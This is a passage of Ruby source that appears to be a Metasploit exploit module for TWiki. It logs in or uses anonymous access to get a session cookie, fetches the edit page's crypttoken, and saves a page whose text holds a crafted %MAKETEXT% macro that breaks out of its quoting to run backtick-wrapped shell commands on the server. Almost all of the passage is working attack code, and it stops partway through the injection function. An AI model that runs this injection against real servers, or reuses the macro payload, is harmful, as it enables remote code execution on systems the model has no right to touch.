register_options(
[
OptString.new('TARGETURI', [ true, "TWiki base path", "/" ]),
OptString.new('TwikiPage', [ false, "TWiki Page with edit permissions to inject the payload, by default random Page on Sandbox (Ex: /Sandbox/MsfTest)" ]),
OptString.new('USERNAME', [ false, "The user to authenticate as (anonymous if username not provided)"]),
OptString.new('PASSWORD', [ false, "The password to authenticate with (anonymous if password not provided)" ])
], self.class)
end
# Authenticate against the TWiki login handler.
#
# POSTs +username+ / +password+ to "#{@base}do/login". A successful login is
# recognised by a 302 redirect whose Set-Cookie header carries a TWIKISID
# value; that hex value is returned as the session id. Anything else (no
# response, a non-302 status, no TWIKISID cookie) yields nil so the caller
# can fall back or abort.
#
# NOTE(review): the cookie pattern uses `[0-9a-f]*`, so an empty TWIKISID
# value would be accepted and an empty string returned — callers that test
# `session.empty?` treat that as "anonymous", which is consistent with the
# rest of this module.
#
# @param username [String] account name to log in as
# @param password [String] password for that account
# @return [String, nil] TWIKISID session id, or nil when login did not succeed
def do_login(username, password)
  login_uri = "#{@base}do/login"
  credentials = { 'username' => username, 'password' => password }

  res = send_request_cgi(
    'method' => 'POST',
    'uri' => login_uri,
    'vars_post' => credentials
  )

  # Only a redirect counts as a successful login.
  return nil unless res && res.code == 302

  # Regexp#match tolerates a missing Set-Cookie header (nil) and returns nil.
  cookie_match = /TWIKISID=([0-9a-f]*)/.match(res.headers['Set-Cookie'])
  cookie_match && cookie_match[1]
end
def inject_code(session, code)
vprint_status("Retrieving the crypttoken...")
res = send_request_cgi({
'uri' => "#{@base}do/edit#{@page}",
'cookie' => "TWIKISID=#{session}",
'vars_get' =>
{
'nowysiwyg' => '1'
}
})
if not res or res.code != 200 or res.body !~ /name="crypttoken" value="([0-9a-f]*)"/
vprint_error("Error retrieving the crypttoken")
return nil
end
crypttoken = $1
vprint_good("crypttoken found: #{crypttoken}")
if session.empty?
if res.headers['Set-Cookie'] =~ /TWIKISID=([0-9a-f]*)/
session = $1
else
vprint_error("Error using anonymous access")
return nil
end
end
vprint_status("Injecting the payload...")
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{@base}do/save#{@page}",
'cookie' => "TWIKISID=#{session}",
'vars_post' =>
{
'crypttoken' => crypttoken,
'text' => "#{rand_text_alpha(3 + rand(3))} %MAKETEXT{\"#{rand_text_alpha(3 + rand(3))} [_1] #{rand_text_alpha(3 + rand(3))}\\\\'}; `#{code}`; { #\" args=\"#{rand_text_alpha(3 + rand(3))}\"}%"
}
})